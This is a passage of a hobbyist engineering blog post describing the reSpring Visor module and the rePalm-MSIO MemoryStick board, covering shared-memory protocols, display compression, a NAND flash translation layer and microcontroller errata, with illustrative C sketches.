I can tell you of more reworks that followed after some in-Visor testing, just to keep the whole rework story together. It turned out that the line to interrupt the Visor was never connected anywhere, so I wired that up to PA4, so that reSpring could send an IRQ to the Visor. It also turned out that the SRAM has a lot of "modes" and it was configured for the wrong one. Three separate pins had to be reworked to switch it from "master" mode into "slave" mode. These modes configure how multiple such SRAMs can be used together. As reSpring only has one, logically it was configured as master. This turns out to have been wrong. Whoops.

Let's stick it into a Visor?

Getting recognized

reSpring module recognized by the Visor

So simple, right? Just stick it into the Visor and be done with it? Reading and re-reading the Handspring Springboard Development Guide provided almost all the info needed, in theory. Practice was different. For some reason, no matter how I formatted the fake ROM in the shared SRAM, the Visor would not recognize it. Finally, I gave up on this approach and wrote a test app to just dump what the Visor sees to the screen, in a series of message boxes. Springboard ROM is always mapped at 0x28000000. I quickly realized the issues. First, the Visor's Springboard bus byteswaps all accesses. This is because most of the world is little-endian, while the 68k CPU is big-endian. To allow peripheral designers not to worry, Handspring byteswaps the bus. "But," you might say, "what about non-word accesses?" There are no such accesses. The Visor always accesses 16 bits at a time. There are no byte-select lines. For us this is actually kind of cool: as long as we communicate using only 16-bit quantities, no byteswapping in software is needed. There was another issue: the Visor saw only every other word that reSpring wrote. This took some investigation, but the result was both hilarious and sad at the same time. Despite all accesses to the Springboard being 16 bits wide, address line 0 is wired to the Springboard connector. Why? Who knows? But it is always low. On the reSpring board, the Springboard connector's A0 was wired to the RAM's A0. But since it is always 0, this means the Visor can only access every other word of RAM - the even addresses. ...sigh... So we do not have 4K of shared RAM. We have 2K... But, now that we know all this, can we get the Visor to recognize reSpring as a Springboard module? YES! The image on the right was taken the first time the reSpring module was recognized by the Visor.

Saving valuable space

Of course, this was only the beginning of the difficulties. Applications run right from the ROM of the module. This is good and bad. For us, it is mostly bad. What does this mean? The ROM image we put in the SRAM must remain there, forever. So we need to make it as small as possible. I worked very hard to minimize the size, and got it down to about 684 bytes. Most of my attempts to overlap structures to save space did not work - the Visor code that validates the ROM on the Springboard module is merciless. The actual application is tiny. It implements the simplest possible messaging protocol (one word at a time) to communicate with the STM. It implements no graphics support and no pen support. So what does it do? It downloads a larger piece of code, one word at a time, from the STM. This code is stored in the Visor's RAM and can run from there. It then simply jumps to that code. Why? This allows us to save valuable SRAM space. So we end up with 2K - 684 bytes = about 1.3K of RAM for sending data back and forth. Not much, but probably passable.

Communications

So, we have 1.3KB of shared RAM and an interrupt going each way; how do we communicate? I designed two communications protocols: a simple one and a complex one. The simple one is used only to bootstrap the larger code into Visor RAM. It sends a single 16-bit message and gets a single 16-bit response. The messages implemented are pretty basic: a request to reply (just to check comms), a few requests to get information on where in the shared memory the large mailboxes for the complex protocol are, a request for how big the downloaded code is, and the message to download the next word of code. Once the code is downloaded and knows the locations and sizes of the mailboxes, it uses the complex protocol. How does it differ? A large chunk of data is placed in the mailbox, and then the simple protocol is used to indicate a request and get a response. The mailboxes are unidirectional, and sized very differently. The STM-to-Visor mailbox occupies about 85% of the space, while the mailbox in the other direction is tiny. The reason is obvious: screen data is large.

All requests originate from the Visor and get a response from the reSpring module. If the module has something to tell the Visor, it will raise an IRQ, and the Visor will send a request for the data. If the Visor has nothing to send, it will simply send an empty NOP message. How does the Visor send a request? First, the data is written to the mailbox, then the message type is written to a special SRAM location, and then a special marker indicating that the message is complete is written to another SRAM location. An IRQ is then raised to the module. The IRQ handler in the STM looks for this "message valid" marker, and if it is found, the message is read and replied to: first the data is written to the mailbox, then the message type is written to the shared SRAM location for message type, and then the "this is a reply" marker is written to the marker SRAM location. This whole time, the Visor is simply loop-reading the marker SRAM location, waiting for it to change. Is this busy-waiting a problem? No. The STM is so fast, and the code to handle the IRQ does so little processing, that the replies often come in microseconds.
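
In Visor-side pseudo-C, one round trip looks something like this; the offsets and marker values are made up for illustration, and only the 0x29000000 IRQ-trigger address is real (it is explained just below):

    #include <stdint.h>

    // All layout below is illustrative; see the text for the real design.
    #define MAILBOX        ((volatile uint16_t *)0x28000800)  // hypothetical offset
    #define MSG_TYPE       (*(volatile uint16_t *)0x28000FFC) // hypothetical
    #define MSG_MARKER     (*(volatile uint16_t *)0x28000FFE) // hypothetical
    #define MARKER_VALID   0x1234   // "message is complete" (hypothetical value)
    #define MARKER_REPLY   0x5678   // "this is a reply" (hypothetical value)

    // Any access to the second chip select raises the IRQ to the STM.
    #define POKE_STM_IRQ() ((void)*(volatile uint16_t *)0x29000000)

    static void send_request(uint16_t type, const uint16_t *data, uint16_t nWords)
    {
        uint16_t i;

        for (i = 0; i < nWords; i++)      // 1. payload into the mailbox
            MAILBOX[i] = data[i];
        MSG_TYPE = type;                  // 2. message type
        MSG_MARKER = MARKER_VALID;        // 3. "message complete" marker
        POKE_STM_IRQ();                   // 4. interrupt the STM

        while (MSG_MARKER != MARKER_REPLY)
            ;                             // busy-wait; replies come in microseconds
    }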

A careful reading of the Handspring Springboard Development Guide might leave you with a question: "What exactly do you mean when you say 'interrupt to the module'? There are no pins for that!" Indeed. There are, however, two chip-select lines going to the module. The first must address the ROM (SRAM, for us). The second chip-select line is free for the module to use. Its base address in the Visor's memory map is 0x29000000. We use that as the IRQ to the STM, and simply access 0x29000000 to cause an interrupt to the STM.

Early Visor support

At this point, some basic things could be tested, but they all failed on the Visor Deluxe and Visor Solo. In fact, everything crashed shortly after the module was inserted. Why? Actually, the reason is obvious: they run PalmOS 3.1, while all other Visors ran PalmOS 3.5. A surprising number of APIs one comes to rely on in PalmOS programming are simply not available on PalmOS 3.1. Such simple things as ErrAlertCustom(), BmpGetBits(), WinPalette(), and WinGetBitmap() simply do not exist. I had to write code to avoid using these on PalmOS 3.1. But some of them are needed. For example, how do I directly copy bits into the display framebuffer if I cannot get a pointer to the framebuffer via BmpGetBits(WinGetBitmap(WinGetDisplayWindow()))? I attempted to just dig into the structures of windows and bitmaps myself, but it turns out that the display bitmap is not a valid bitmap in PalmOS 3.1 at all. In the end, I realized that PalmOS 3.1 only supported the MC68EZ328 and MC68328 processors, and both of them configure the display controller base address in the same register, so I just read it directly. As for palette setting, it is not needed, since PalmOS 3.1 does not support color or palettes. Easy enough.
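
A sketch of that fallback; the LSSA (LCD Screen Starting Address) register lives at 0xFFFFFA00 on both DragonBall variants per their datasheets, but treat the exact version check and cast here as illustrative:

    #include <PalmOS.h>

    // Get a pointer to the display framebuffer, even on PalmOS 3.1.
    static void *GetFramebuffer(void)
    {
        UInt32 romVersion;

        FtrGet(sysFtrCreator, sysFtrNumROMVersion, &romVersion);
        if (romVersion >= sysMakeROMVersion(3, 5, 0, sysROMStageRelease, 0)) {
            // PalmOS 3.5+: the official way.
            return BmpGetBits(WinGetBitmap(WinGetDisplayWindow()));
        }

        // PalmOS 3.1 on MC68328/MC68EZ328: read the LCD controller's
        // screen starting address register (LSSA) directly.
        return (void *)(*(volatile UInt32 *)0xFFFFFA00);
    }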

Making it work well

Initial data

Visor showing garbled OS5.2 touch screen calibration dialog

Some data is needed by rePalm before it can properly boot: the screen resolution and supported depths, hardware flags (e.g., whether the screen has brightness or contrast adjustment), and whether the device has an alert LED (yes, you read that right; more on this later). Thus rePalm does not boot until it gets a "continue boot" message, which is sent by the code on the Visor once it has collected all this info.

Sending display data

The highest-bandwidth data we need to transfer between the Visor and the reSpring module is the display data. For example, for a 160x160 screen at 16 bits per pixel at 60 FPS, we'd need to transfer 160x160x16x60 = 23.44Mbps. Not a low data rate at all to attempt on a 33MHz 68k CPU. In fact, I do not think it is even possible. For 4-bits-per-pixel greyscale the numbers look a little better: 160x160x4x60 = 5.86Mbps. But there is a second problem. Each message needs a full round trip. We are limited by the Visor's interrupt latency and our general round-trip latency. Sadly, that latency is as high as 2-4ms. So we need to minimize the number of packets sent. We'll come back to this later. Initially, I just sent the data piecewise and displayed it onscreen. Did it work the first time? Actually, almost. The image to the right shows the results. All it took was a single byteswap to get it to work perfectly!

It was quite slow, however - about 2 frames per second. Looking into it, I realized that the call to MemMove was one of the reasons. I wrote a routine optimized for moving large chunks of data, given that they are never overlapped and always aligned. This improved the refresh rate to about 8 frames per second on the greyscale devices. More improvement was needed. The major issue was the round-trip time of copying data in, waiting, copying it out, and so on. How do we minimize the number of round trips? Yup - compress the data. I wrote a very, very fast lossless image compressor on the STM. It works somewhat like LZ, with a hashtable to find previous occurrences of a data pattern. The compression ratios were very, very good, and refresh rates went up to 30-40 FPS on the greyscale devices. Color Bejeweled became playable, even!
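
The general idea of such a hashtable-based LZ compressor, sketched out (this is not rePalm's actual format or code, just the technique):

    #include <stdint.h>
    #include <string.h>

    #define HASH_BITS  12
    #define MIN_MATCH  4

    static uint32_t hash4(const uint8_t *p)
    {
        uint32_t v;
        memcpy(&v, p, 4);
        return (v * 2654435761u) >> (32 - HASH_BITS);
    }

    // Compress src into dst. Output records: 0x00 + literal byte, or
    // 0x01 + 16-bit offset + 8-bit extra length (match of MIN_MATCH + extra).
    // Returns compressed size. dst must be sized for the worst case (2x).
    uint32_t lz_compress(const uint8_t *src, uint32_t len, uint8_t *dst)
    {
        static uint32_t table[1 << HASH_BITS];  // position + 1 of last occurrence
        uint32_t i = 0, out = 0;

        memset(table, 0, sizeof(table));
        while (i < len) {
            uint32_t cand = 0, matchLen = 0;

            if (i + MIN_MATCH <= len) {
                uint32_t h = hash4(src + i);
                cand = table[h];
                table[h] = i + 1;
            }

            if (cand && i - (cand - 1) <= 0xffff &&
                !memcmp(src + cand - 1, src + i, MIN_MATCH)) {
                // Extend the match as far as it goes (cap the encodable length).
                uint32_t pos = cand - 1, max = len - i;
                if (max > MIN_MATCH + 255)
                    max = MIN_MATCH + 255;
                matchLen = MIN_MATCH;
                while (matchLen < max && src[pos + matchLen] == src[i + matchLen])
                    matchLen++;
            }

            if (matchLen) {
                uint32_t off = i - (cand - 1);
                dst[out++] = 0x01;
                dst[out++] = (uint8_t)off;
                dst[out++] = (uint8_t)(off >> 8);
                dst[out++] = (uint8_t)(matchLen - MIN_MATCH);
                i += matchLen;
            } else {
                dst[out++] = 0x00;
                dst[out++] = src[i++];
            }
        }
        return out;
    }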

Actually getting the display data was also quite interesting. PalmOS 5 expects the display to just be a framebuffer that may be written to freely. While there are APIs to draw, one may also just write to the framebuffer. This means that there isn't really a way to get notified when the image onscreen changes. We could send screen data constantly; in fact, this is what I did initially. This depletes the Visor battery at about two percent a minute, since the CPU is constantly busy. Clearly this is not the way to go. But how can we get notified when someone draws? The solution is a fun one: we use the MPU. We protect the framebuffer from writes. Reads are allowed, but any write causes an exception. We handle the exception by setting a timer for 1/60 of a second later, then we permit writes and return. The code that was drawing resumes, none the wiser. When our timer fires, we re-lock the framebuffer and request to transfer a screenful of data to the Visor. This allows us to not send the same data over and over. Sometimes writes to the screen also change nothing, so I later added a second layer: anytime we send a screenful of data, we keep a copy, and the next time we're asked to send, we compare, and do nothing if the image is the same. Together with compression, these two techniques bring us to a reasonable power usage and screen refresh rate.
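
The write-tracking trick, as a sketch; mpu_protect_fb(), timer_arm(), and queue_screen_send() are hypothetical stand-ins for the real driver code:

    #include <stdbool.h>
    #include <stdint.h>

    // Hypothetical helpers: MPU region control, a one-shot timer, and the
    // code that kicks off a (diffed, compressed) screen transfer.
    void mpu_protect_fb(bool readOnly);
    void timer_arm(uint32_t usec, void (*cb)(void));
    void queue_screen_send(void);

    static void FrameTimerFired(void)
    {
        mpu_protect_fb(true);      // re-arm the write trap for the next frame
        queue_screen_send();       // ship the framebuffer to the Visor
    }

    // MemManage fault handler: fires on the first write to the framebuffer
    // after it was locked. (Real code must check the faulting address!)
    void MemManage_Handler(void)
    {
        mpu_protect_fb(false);             // let this write (and later ones) through
        timer_arm(1000000 / 60, FrameTimerFired);
        // On return, the faulting store is retried and now succeeds.
    }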

Buttons, pen, brightness, contrast, and battery info

Since the Visor can send data to the reSpring module anytime it wishes, sending button and pen info is easy: just send a message with the data. For transferring data the other way, the design is also simple. The module raises an IRQ, the Visor sends a NOP message, and in reply the module sends its request. There are requests for setting the display palette, brightness, and contrast, and for getting battery info. The Visor will perform the requested action, and perhaps reply (e.g., with the battery info).

Microphone support

The audio amp turned out to be quite miswired on the v1 boards, but after some complicated reworks, it was possible to test basic audio recording functionality. It worked! Due to the nature of the reworks, the quality was not stellar, but I could recognize my voice as I said "1 2 3 4 5 6 7" to the voice memo app. In reality, though, amplifying the Visor's mic is a huge pain - we need 40dB of gain to get anything useful out of the ADC. The analog components needed to do this properly and noise-free are just too expensive and numerous, so for v2 it was decided to just populate a digital mic on the board - it is actually cheaper. Plus, no analog is the best amount of analog for a board!

Polish

Serial/IrDA

I support forwarding the Visor's serial port to reSpring. What is this for? HotSync (works) and IR beaming (mostly works). This is actually quite a hard problem to solve. To start with, in order to support PalmOS 3.1, one must use the Old Serial Manager API. I had never used it, since PalmOS 3.3 introduced the New Serial Manager and I had almost never written any code for PalmOS before 4.1. The APIs are actually similar, and both are quite hostile to what we need. We need to be told when data arrives, without busy-waiting for it. Seemingly there is no API for this. Repeatedly and constantly checking for data works, but wastes battery. Finally, I figured out that by using the "receive window" and the "wakeup handler", both of which are halfway-explained in the manual, I can get what I need: a callback when data arrives. I also found that, while lightly documented, there is a way to give the Serial Manager a larger receive buffer. This allows us to not drop received data even if we take a few milliseconds to get it out of the buffer. I was able to use all of this to wire up the Visor's serial port to a driver in reSpring. Sadly, beaming requires a rather quick response rate, which is hard to reach with our round-trip latency. Beaming works, but not every time. HotSync does work, even over USB.

Alarm LED

Since rePalm supports alarm LEDs and some Visors have LEDs (Pro, Prism, and Edge), I wanted to wire one up to the other. There is no public API for LED access on Handspring devices. Some reverse engineering showed that the Handspring HAL does have a function to set the LED state: HalLEDCommand(). It does precisely what I want, and can be called simply as TRAP #1; dc.w 0xa014. There is an issue, though. Earlier versions of the Handspring HAL lack this function, and if you attempt to call it, they will crash. "Surely," you might say, "all devices that support the LED implement this function!" Nope... Visor Prism devices sold in the USA do not. The EFIGS version does, as do all later devices. This convenient hardware-independent function was thus not available to me. What to do? Well, there are only three devices that have an LED, and I can detect them. Let's go for direct hardware access then! On the Visor Edge the LED is on GPIO K4, on the Pro it is K3, and on the Prism it is C7. We can write this GPIO directly, and it works as expected.


There are two driver modes for the LED and vibrator in rePalm: simple and complex. In simple mode, rePalm gives the LED/vibrator very simple "turn on now" / "turn off now" commands. This is suitable for a directly-wired LED/vibrator. In the reSpring case, we actually prefer the complex driver, where the OS tells us "here is the LED/vibrator pattern, here is how fast to perform it, this many times, with this much time in between." This is suitable for when you have an external controller that drives the LED/vibrator. Here we do have one: the Visor is our external controller. So we simply send these commands to the Visor, and our downloaded code performs the proper actions using a simple state machine.

Software update

I wanted reSpring to be able to self-update from the SD card. How could this be accomplished? Well, the flash in the STM32 can be written by code running on the STM32, so logically it should not be hard. A few complications exist. To start with, the entire PalmOS is running from flash, including the drivers for various hardware pieces. Our comms layer for talking to the Visor is also in there. So to perform the update we need to stop the entire OS and disable all interrupts and drivers. OK, that is easy enough, but among those drivers are the drivers for the SD card, where our update is. We need that. Easy to solve: copy the update to RAM before starting the update - RAM needs no drivers. But how do we show progress to the user? Our framebuffer is not real; making the Visor show it requires a lot of code and working interrupts. There was no chance this would work as normal.

I decided that the best way to do this was to have the Visor draw the update UI itself, and just use a single SRAM location to show progress. Writing a single SRAM location is something our update process can do with no issues, since the SRAM needs no drivers - it is just memory-mapped. The rest was easy: a program to load the update into RAM, send the "update now" message, and then flash the ROM, all the while writing the "percent completed" to the proper SRAM location. This required exporting the "send a message" API from the rePalm DAL for applications to use. I did that.

Onboard NAND

You wanted pain? Here's some NAND

The reSpring board has 256MB of NAND flash on a QSPI bus. Why? Because at the time it was designed, I thought it would be cool, and it was quite cheap. NAND is the storage technology underlying most modern storage - your SD cards, your SSD, and the storage in your phone. But, NAND is hard - it has a number of anti-features that make it rather difficult to use for storage. First, NAND may not properly store data - error correction is needed as it may occasionally flip a bit or two. Worse, more bit flips may accumulate over time, to a point where error correction may not be enough, necessitating moving data when such a time approaches. The smallest addressable unit of NAND is a page. That is the size of NAND that may be read or programmed. Programming only flips one bits to zero, not the reverse. The only way to get one bits back is an erase operation. But that operates on a block - a large collection of pages. Because you need error correcting codes, AND bits can only be flipped from one to zero, overwriting data is hard (since the ECC code you use almost certainly will need more ones). There are usually limits to how many times a page may be programmed between erases anyways. There are also usually requirements that pages in a block be programmed in order. And, for extra fun, blocks may go bad (failing to erase or program). In fact a NAND device may ship with bad blocks directly from the factory! Clearly this is not at all what you think of when you imagine block storage. NAND requires careful management to use for storage. Since blocks die due to wear, caused by erasing, you want to evenly wear across the entire device. This may in turn necessitate movinig more data. At the same time while you move data, power may go out so you need to be careful when and what is erased and where it is written. Keeping a consistent idea of what is stored where is hard. This is the job of an FTL - a flash translation layer. An FTL takes the mess that is nand and presents it as a normal block device with a number of sectors which maybe read and written to randomly, with no concern for things like error correction, erase counts, and page partial programming limits.

To write an FTL...

I had written an FTL long ago, so I had some basic idea of the process involved. This was, however, more than a decade ago. It was fun to try to do it again, but better. This time I set out with a few goals. The number one priority was to absolutely never lose any data in face of random power loss since the module may be removed from the Visor randomly at any time. The FTL I produced will never lose any data, no matter when you randomly cut its power. A secondary priority was to minimize the amount of RAM used, since, afterall, reSpring only has 8MB of it!

The pages in the NAND on reSpring are 2176 bytes in size. Of that, 4 are reserved for "bad block marker", 28 are free to use however you wish, with no error correction protection, and the rest is split into 4 equal parts of 536 bytes, which, if you desire, the chip can error-correct (by using the last 16 of those bytes for the ECC code). This means that per page we have 2080 error-corrected bytes and 28 non-error-corrected bytes. Blocks are 64 pages each, and the device has 2048 blocks, of which they promise at least 2008 will be good from the factory. Having the chip do the ECC for us is nice - it has a special hardware unit and can do it much faster then our CPU ever could in software. It will even report to us how many bits were corrected on each read. This information is vital because it tells us about the health of this page and thus informs our decision as to when to relocate the data before it becomes unreadable.

I decided that I would like my FTL to present itself as a block device with 4K blocks. This is the cluster size FAT16 should optimally use on our device, and having larger blocks allows us to have a smaller mapping table (the map from virtual "sector number" to real "page number"). Thus we'd treat two pages together as one always. This means that each of our virtual pages will have 4160 bytes of error-corrected data and 56 bytes of non-erorr corrected data. Since our flash allows writing the same page twice, we'll use the un-error-corrected area ourselves with some handmade error corection to store some data we want to persist. This will be things like how many times this block has been erased, same for prev and next blocks, and the current generation counter to figure out how old the information is. The handmade ECC was trivial: hamming code to correct up to one bit of error, and then replicate the info plus the hamming code three times. This should provide enough protection. Since this only used the un-error-corrected part of the pages, we can then easily write error-correctd-data over this with no issues. Whenever we erase a page, we write this data to it immediately. If we are interrupted, the pages around it have the info we need and we can resume said write after power is back on.

The error-corected data contains the user data (4096 bytes of it) and our service data, such as what vitual sector this data is for, generation counter, info on this and a few neighboring blocks, and some other info. This info allows us to rebuild the mapping table after a power cycle. But clearly reading the entire device each power on is slow and we do not want to do this. We thus support checkpoints. Whenever the device is powered off, or the FTL is unmounted, we write a checkpoint. It contains the mapping data and some other info that allows us to quickly resume operation without scanning the entire device. Of course in case of an unexpected power off we do need to do a scan. For those cases there is an optimization too - a directory at the end of each block tells us what it contains - this allows the scan to read only 1/32nd of the device instead of 100% of it - a 32x speedup!

Read and write requests from PalmOS directly map to the FTL layer's read and write. Except there is a problem - PalmOS only supports block devices with sector sizes of 512 bytes. I wrote a simple translation layer that does read-modify-write as needed to map my 4K sectors to PalmOS's 512-byte sectors, if PalmOS's request did not perfectly align with the FTL's 4K sectors. This is not as scary or as slow as you imagine it, because PalmOS uses FAT16 to format the device. When it does, it asks the device about its preferred block size. We repy with 4K and from then on, PalmOS's FAT driver only writes complete 4K clusters - which align perfectly with out 4K FTL sectors. The runtime memory usage of the FTL is only 128KB - not bad at all, if I do say so myself! I wrote a very torturous set of tests for the FTL and ran it on my computer over a few nights. The test simulated data going bad, power off randomly, etc. The FTL passed. There is actually a lot more to this FTL, and you are free to go look at the source code to see more.

One final WTF

Among all this work, rePalm worked well, mostly. Occasionally it would lose a message from the Visor to the module or vice-versa. I spent a lot of time debugging this and came to a startling realization. The dual-ported SRAM does not actually support simultaneous access to the same address by both ports at once. This is documented in its datasheet as a "helpful feature" but it is anything but. Now, it might be reasonable to not allow two simultaneous writes to the same word, sure. But two reads should work, and a read and a write should work too (with a read returning the old data or the new data, or even a mix of the two). This SRAM instead signals "busy" (which is otherwise never does) to one side. Since it is not supposed to ever be busy, and the Springboard slot does not even have a BUSY pin, these signals were wired nowhere. This is where I found this stuff in the footnote in the manual. It said that switching the chip to SLAVE mode and raising the BUSY pins (which are now inputs) to HIGH will allow simultaneous access. Well, it sort of does. There is no more busy signalling, but sometimes a write will be DROPPED if it is executed concurrently with a read. And a read will sometimes return ZERO if executed concurrently with another read or write, even if the old and new data were both not zero. There seems to be no way around this. Another company's dual-ported SRAM had the same nonsense limitation, leading me to believe that nobody in the industry makes REAL dual-ported SRAMs. This SRAM has something called "semaphores" which can be used to implement actual semaphores that are truly shared by both devices, but otherwise it is not true dual-ported RAM. Damn!

Using these semaphores would require significant rewiring: we'd need a new chip select line going to this chip, and need to invent a new way to interrupt the STM since the second chip select line would be now used to access semaphores. This was beyond my rework abilities, so I just beefed up the protocol to avoid these issues. Now the STM will write each data word that might be concurently read 64 times, and then read it back to verify it was written. The comms protocol was also modified to never ever use zeroes, and thus if a zero is seen, it is clear that a re-read was necessary. With these hacks the communication is stable, but in the next board rev rev I think we'll wire up the semaphores to avoid this nasty hack!

More real hardware

rePalm-MSIO

rePalm-MSIO first board

After documenting the Sony MemoryStick protocol , an opportunity presented itself - why not a rePalm version on a MemoryStick? In theory, I could get a microcontroller to act as a MemoryStick device, load a program unto the host Sony PalmOS device, and then take over it, like reSpring did. That was the idea, of course. The space is tight, and timing requirement insane. The fact that the MemoryStick protocol is so much unlike any normal sane bus means that there will be no simple solutions. However, I was determined to make this work.

MCU selection

STM32F429 and an SDRAM chip together would take up too much space to fit inside a MemoryStick slot. Instead, a 64-pin STM32H7 chip is used. It has 1.25MB of internal ram, which is a bit little for PalmOS. Luckily, it supports a rather rare thing: a read/write QSPI interface - perfect for interfacing with QSPI PSRAM chips like APS6404L from APMemory! This allows for 8MB of RAM without taking up a lot of board space or needing a boatload of pins! STM32H7 is also a Cortex-M7, which is quite an improvement from the Cortex-M4 core in the STM32F429. M7 is faster per-cycle, and has a cache! The fact that STM32F429 had no cache was a serious handicapping factor for it when running code from RAM, since the RAM was limited to half the core clock speed. With a small-enough working set, the M7 can operate at full speed from cache! Cool! There is also TCM - some memory near the core that always operates at full speed with no delay or wait-states!

I laid out the board such that it would fit into the MemoryStick slot. It is a 4-layer board (which is apparently very cheap now). This makes routing easier and signal integrity better. With the proper board thickness, there is just enough space for the chips to fit. It all works, inserts, clicks, everything! Pretty amazing, actually. Of course, there were errors, but by the second revision of the board, only one bodge wire was needed, as you can see in the picture. The board is precisely the size of a MemoryStick. There is extra that sticks out, those are the debugging headers and it is break-away. I have one where I did break it away and it is amazing how well it fits inside.

The bugs...

Of course, this being an STM chip, there were bugs. The chip would sometimes lock up entirely when executing from QSPI RAM. When consulted, ST suggested changing the MPU parameters to make the QSPI RAM uncacheable. This is an idiotic suggestion, because even if it worked (spoiler: it does not), it would make that RAM slow beyond any degree of usefulness. In any case, when I tried that, the RAM got corrupted. I verified this with bus traces and presented it to STM. Eventually they admitted that any writes to the QSPI interface that are not sequential and word-sized will cause corruption. Somehow, that info tells me precisely which single test they ever ran on this peripheral. Sigh...
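
With that erratum in mind, any manual copy into the QSPI-mapped RAM has to use only sequential, aligned, word-sized stores. A minimal sketch, assuming a word-aligned destination and a length that is a whole number of words:

#include <stdint.h>
#include <stddef.h>

/* copy into QSPI-mapped PSRAM using only sequential 32-bit stores, since
   (per the erratum above) anything else risks corrupting the contents */
static void qspiCopy(volatile uint32_t *dst, const uint32_t *src, size_t lenWords)
{
    for (size_t i = 0; i < lenWords; i++)
        dst[i] = src[i];
}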

Luckily, with the cache on, a dirty cache-line eviction will always sequentially write an integer number of words, so there is hope. Sadly, the chip would work for a while, and then lock up. The lockup was very strange: my debugger was unable to connect to the core in this state at all, but it could access the debug access port itself. This led me to believe that it was not the core that locked up but the internal AHB fabric. I was able to confirm this by attaching to another debug access port (the one on AHB3), where I could look around but had no access to the main AHB busses. STM had no ideas.

Given what I knew about how AHB buses work, guesses on how ST likely designed the arbiters, and how ST likely wired up their QSPI unit to it all, I guessed at the issue, and at a workaround that might work. After some prototyping, I can confirm that it does. The performance cost is about 20% (compared to no workaround enabled), but at least there are no more hangs. Why am I being so cagey about what the workaround is? Well, while denying the issue exists, STM asked for the precise details of my workaround once they heard I had found one. Apparently an actually-important client also hit this issue. I am currently refusing to disclose the workaround until they agree to admit the issue. So far it is a stalemate, which is fine - I am losing no sales over it. Them...?

MSIO low level

The main signal that controls the protocol phases is BS, and it always leads the actual state transition by a cycle, which makes it very hard to use for anything. If only it were not one cycle early, I could use it (and its inverse) as chip selects and try to use the hardware SPI units somehow. After some head-scratching, a solution became evident: two flip-flops will do. Running the BS signal through them delays it by a cycle. Finding a dual negative-edge-triggered flip-flop turned out to be impossible, so an inverter was thrown into the mix, letting me use an easily-available SN74LVC74A.

With the BS signal delayed, it could be used as a chip select for some SPI units. To make this work, I wired THREE SPI units together. The first edge of BS triggers a DMA channel that enables the three SPI units: one receives the TPC, and the second and third are ready to receive the data that follows. We have no time to validate the TPC in the meantime, so we prime the SPI units to receive it no matter what; this is harmless. This first BS edge also triggers a software interrupt. Assuming not too many delays, we arrive in the IRQ after the TPC has already been received and, if the transaction is a write, the data is already on the way in. If we are less lucky, the data might even have already been entirely received. Here we can validate the TPC and check its direction. If this is a READ, we need to send the handshaking pattern immediately, so we use one of the SPI units to do that now. While that goes on, we find the data and queue it up for transmission, telling the SPI unit to also send the CRC after it. If this was a WRITE, we had two SPI units receiving the data: one copied the data to RAM, the second fed it to the CRC unit (the STM32H7 cannot CRC incoming data if we do not know the length up front). We quickly check the CRC and configure one of the SPI units to send the handshaking pattern to acknowledge the data.
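
In pseudo-C, the handler that runs off the first BS edge looks roughly like this. Every helper name here is a hypothetical stand-in for raw SPI/DMA/CRC register pokes; the real code is tighter and runs from ITCM:

#include <stdint.h>
#include <stdbool.h>

/* hypothetical helpers standing in for register-level manipulation */
extern uint8_t spi1TakeReceivedByte(void);
extern bool tpcIsRead(uint8_t tpc);
extern const uint8_t *lookupReadData(uint8_t tpc);
extern void spi2SendHandshake(void);
extern void spi2QueueTx(const uint8_t *data, bool appendCrc);
extern bool crcUnitMatches(void);
extern void spi3SendHandshake(void);

/* fires on the first BS edge; by the time we get here the TPC has
   (hopefully) already been clocked in */
void msioBsIrqHandler(void)
{
    uint8_t tpc = spi1TakeReceivedByte();

    if (tpcIsRead(tpc)) {
        spi2SendHandshake();                    /* the reply window is tiny */
        spi2QueueTx(lookupReadData(tpc), true); /* data, then CRC           */
    } else {
        /* one SPI unit copied the payload to RAM, another fed the CRC unit */
        if (crcUnitMatches())
            spi3SendHandshake();                /* ACK the write */
    }
}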

"Now, this all sounds very fragile," an astute observer would say. Yes! Very. It also means that we cannot ever disable interrupts for very long, since there is only a few cycles of leeway between the data being sent to us and a reply being needed to avoid the host timing out. I had to rearchitect rePalm kernel's interrupt handling a little bit, to allow some interrupts to NEVER be disabled, in return for some concessions from those interrupt handlers: they do not make any syscalls or modify any state shared with any other piece of code. So then how do we interface with them? When an MSIO transaction finishes, the data is placed into a shared buffer, and a software interrupt is triggered, which is handled normally by normal code with normal constraints. This can be disabled, prioritized, etc, since it is not time critical anymore. Of course, all the time-critical code must be run from the ITCM (the tightly-coupled instruction memory) to make the deadlines.

When the STM32H7 runs at 320MHz, this works most of the time with newer Palm devices, since they run the MSIO interface at 16MHz, giving me some breathing room. Older devices like the S500C are tougher: they run the MSIO bus at 20MHz, and the timings are very tight. Things work well, but if the core is waiting on an instruction fetch from QSPI, it will not jump to the interrupt handler until that completes, causing larger latency. Sometimes this causes an MSIO interrupt handler to be late and miss the proper window to ACK a transaction. My host-side driver retries and papers over this. The real solution is a tiny FPGA to offload this from the main MCU; I'm looking into it.

MSIO high level

rePalm-MSIO running on a PEG-S500C

As no MSIO drivers for rePalm exist, I had to write and provide them. But how would a user get them onto the device? In theory, as far as my reverse-engineering can tell, a MemoryStick may have multiple functions - possibly memory plus one or more IO functions. No such stick was ever observed in the wild, so I set out to create the first. Why not? The logic of how it should work is rather simple: function 0xFF should be memory, and any other unused function number could be used for rePalm IO. I picked function number 0x64. Why pretend to be memory at all? To give the user the driver, of course!

My code does the minimum needed to pretend to be a read-only MemoryStick with 4MB of storage. As MemorySticks are raw NAND devices, my code pretends to be a perfect one - no bad blocks, no error correction ever needed. The fake medium is "formatted" with FAT12 and contains a rather curious filesystem indeed. To support ALL the Sony devices, the driver is needed in a few places. Anything with PalmOS 4.0 or later will show files in /PALM/LAUNCHER to the user, and will auto-launch /PALM/START.prc on insertion. Anything with an earlier PalmOS version will only allow the user to browse /PALM/PROGRAMS/MSFILES. All but the first Sony devices also had another way to auto-launch an executable on stick insertion: a Sony utility called "MS AutoRun". It reads a config file at /DEFAULT.ARN and loads the specified program to RAM on insertion. Auto-run is never triggered if the MemoryStick was already inserted at device boot, so we cannot rely on it. This is why we need the file itself to be visible and accessible to the user for manual launching. Let's count, then, how many copies of the driver app our MemoryStick needs: one in /PALM/LAUNCHER, one in /PALM/PROGRAMS/MSFILES, and one as /PALM/START.prc. Three copies. Now, this will not do! If only FAT12 supported hard links...

